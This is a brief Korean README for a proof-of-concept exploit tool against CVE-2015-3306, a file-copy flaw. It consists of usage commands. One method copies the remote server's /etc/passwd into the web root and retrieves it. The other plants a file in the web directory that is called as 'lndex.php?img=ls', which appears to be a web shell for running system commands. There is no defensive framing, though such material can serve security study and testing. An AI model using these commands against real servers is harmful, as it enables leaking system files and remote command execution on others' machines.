
CVE-2015-3306 익스플로잇 도구
CVE-2015-3306 악용을 위한 Daniel Aldana의 PoC입니다. 버그는 Vadim Melihow가 보고했습니다.
###방법 1:
사용법:
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_SRC_FILE> <REMOTE_ABSOLUTEPATH_DST_FILE>
예:
python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt
그런 다음 시도:
http://127.0.0.1/pass.txt
###방법 2:
사용법:
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_WEBDIR>
예:
python cpx_proftp.py 127.0.0.1 /var/www/html
그런 다음 시도:
http://127.0.0.1/lndex.php?img=ls